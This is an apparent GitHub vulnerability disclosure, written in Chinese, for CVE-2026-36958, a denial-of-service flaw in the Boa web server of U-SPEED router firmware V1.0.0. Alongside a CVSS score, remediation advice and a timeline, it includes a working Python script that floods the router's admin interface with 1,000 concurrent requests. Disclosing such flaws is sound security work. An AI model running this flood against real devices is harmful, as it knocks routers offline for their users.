kirubel-cve/CVE-2026-36958

GitHub: kirubel-cve/CVE-2026-36958

CVE-2026-36958 的概念验证代码,演示了如何通过并发 HTTP 请求对 U-SPEED 路由器的 Boa Web 服务器发起拒绝服务攻击。

Stars: 0 | Forks: 0

# CVE-2026-36958:通过并发 HTTP 请求导致拒绝服务 **CVE ID:** CVE-2026-36958 **日期:** 2026-04-29 **发现者:** Kirubel Solomne **供应商:** U-SPEED **产品:** U-SPEED 路由器 **固件版本:** V1.0.0 **CWE:** CWE-400 - 不受控制的资源消耗 ## 描述 U-SPEED 路由器固件 V1.0.0 存在拒绝服务漏洞。通过向 Web 管理界面上的随机或不存在的 endpoint 发送大量并发 HTTP 请求,攻击者可以耗尽嵌入式 Boa HTTP 服务器中的系统资源。这会导致路由器的 Web 界面变得无响应,可能需要手动重启才能恢复正常运行。 ## CVSS 评分 **CVSS v3.1 评分: 7.5 (高危)** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` | 指标 | 值 | |---|---| | 攻击途径 | 网络 | | 攻击复杂度 | 低 | | 权限要求 | 无 | | 用户交互 | 无 | | 机密性影响 | 无 | | 完整性影响 | 无 | | 可用性影响 | 高 | ## 概念验证 ``` import requests import threading TARGET = "http://192.168.10.1" def flood(i): try: requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2) except: pass threads = [] for i in range(1000): t = threading.Thread(target=flood, args=(i,)) threads.append(t) t.start() for t in threads: t.join() print("Done. Check if router web interface is still responsive.") ``` **预期行为:** 服务器应正常处理并发连接。 **实际行为:** Web 界面变得无响应;需要手动重启。 ## 影响 - Web 管理界面变得不可用 - 可能会中断路由服务 - 需要手动重启以恢复功能 ## 修复建议 - 在 Boa web 服务器上实施连接速率限制 - 限制每个源 IP 的最大并发连接数 - 添加自动恢复/看门狗 (watchdog) 机制 ## 披露时间线 | 日期 | 事件 | |---|---| | 2026-04-29 | 发现漏洞 | | 2026-04-29 | 报告给 MITRE | | 2026-04-29 | 分配 CVE-2026-36958 | | 2026-04-29 | 公开披露 | ## 参考 - [MITRE CVE-2026-36958](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-36958) - [CWE-400](https://cwe.mitre.org/data/definitions/400.html) - [供应商网站](http://u-speed.com)
标签:Boa Web服务器, CPU/内存耗尽, CVE-2026-36958, CVSS 7.5, CWE-400, DDoS, DoS, IoT安全, PoC, Python, U-SPEED路由器, Web管理界面, 嵌入式设备, 并发HTTP请求, 并发连接, 拒绝服务, 无后门, 暴力破解, 漏洞披露, 网络安全, 资源耗尽, 路由器安全, 逆向工具, 隐私保护, 高严重性漏洞